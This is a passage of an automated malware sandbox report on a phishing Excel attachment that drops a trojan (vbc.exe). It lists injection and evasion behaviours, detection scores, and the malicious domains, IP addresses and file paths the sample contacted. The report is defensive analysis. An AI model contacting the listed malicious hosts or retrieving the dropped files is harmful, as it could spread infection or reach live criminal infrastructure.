49168, 80 GOOGLEUS United States 23->38 40 paletciniz.com 160.153.138.53, 49169, 80 GODADDY-AMSDE United States 23->40 42 3 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 27 wscript.exe 23->27         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PI202009255687.xlsx25%ReversingLabsDocument-Word.Trojan.Phishing

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe31%ReversingLabsWin32.Trojan.Jaik
          C:\Users\Public\vbc.exe31%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu6%VirustotalBrowse
          www.annaothomas.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.paletciniz.com/2019/08/creative-portfolio-freelance/0%Avira URL Cloudsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.paletciniz.com/2020/08/hello-world/#comment-10%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.min0%Avira URL Cloudsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/v0%Avira URL Cloudsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=0%Avira URL Cloudsafe
          http://www.paletciniz.com/d41d8-contact/0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://www.paletciniz.com/comments/feed/0%Avira URL Cloudsafe
          https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppe0%Avira URL Cloudsafe
          http://www.paletciniz.com/0%Avira URL Cloudsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.paletciniz.com/d41d8-blog/0%Avira URL Cloudsafe
          http://www.paletciniz.com/wp-json/0%Avira URL Cloudsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://www.paletciniz.com/feed/0%Avira URL Cloudsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
          		103.141.138.87
          		truetrueunknown
          paletciniz.com
          		160.153.138.53
          		truetrue
            		unknown
            lygosfilms.info
            		34.102.136.180
            		truetrue
              		unknown
              www.annaothomas.com
              		104.164.99.242
              		truetrueunknown
              www.paletciniz.com
              		unknown
              		unknowntrue
                		unknown
                www.lygosfilms.info
                		unknown
                		unknowntrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://search.ebay.de/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.mtv.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://www.paletciniz.com/2019/08/creative-portfolio-freelance/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.rambler.ru/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://buscar.ya.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://asp.usatoday.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://rover.ebay.comexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://search.ebay.in/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://www.paletciniz.com/2020/08/hello-world/#comment-1wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://%s.comexplorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		low
                                                http://msk.afisha.ru/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.minwscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://search.rediff.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://search.naver.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://www.google.ru/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/vwscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://search.daum.net/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://buscar.ozu.es/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://search.about.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.ask.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.cjmall.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://gmpg.org/xfn/11wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://search.centrum.cz/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://suche.t-online.de/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.google.it/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.paletciniz.com/d41d8-contact/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://search.auction.co.kr/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.ceneo.pl/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.amazon.de/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000002.2389413507.0000000000260000.00000004.00000020.sdmpfalse
                                                                                            		high
                                                                                            http://sads.myspace.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.paletciniz.com/comments/feed/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppewscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://themeisle.com/themes/neve/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.paletciniz.com/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://search.sify.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://search.ebay.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://search.nifty.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.paletciniz.com/d41d8-blog/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.google.si/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://wordpress.orgwscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.google.cz/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.soso.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.univision.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.paletciniz.com/wp-json/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://search.ebay.it/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.paletciniz.com/feed/wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown

                                                                                                                                      Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      160.153.138.53
                                                                                                                                      		unknownUnited States
                                                                                                                                      		21501GODADDY-AMSDEtrue
                                                                                                                                      104.164.99.242
                                                                                                                                      		unknownUnited States
                                                                                                                                      		18779EGIHOSTINGUStrue
                                                                                                                                      103.141.138.87
                                                                                                                                      		unknownViet Nam
                                                                                                                                      		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                      34.102.136.180
                                                                                                                                      		unknownUnited States
                                                                                                                                      		15169GOOGLEUStrue

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                      Analysis ID:323042
                                                                                                                                      Start date:26.11.2020
                                                                                                                                      Start time:08:58:52
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 9m 40s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:light
                                                                                                                                      Sample file name:PI202009255687.xlsx
                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                      Number of analysed new started processes analysed:11
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.expl.evad.winXLSX@9/6@4/4
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HDC Information:
                                                                                                                                      • Successful, ratio: 38.2% (good quality ratio 36.3%)
                                                                                                                                      • Quality average: 77.7%
                                                                                                                                      • Quality standard deviation: 28.5%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 94%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI
                                                                                                                                      • Found application associated with file extension: .xlsx
                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                      • Attach to Office via COM
                                                                                                                                      • Scroll down
                                                                                                                                      • Close Viewer
                                                                                                                                      Warnings:
                                                                                                                                      Show All
                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                      • TCP Packets have been reduced to 100

                                                                                                                                      Simulations

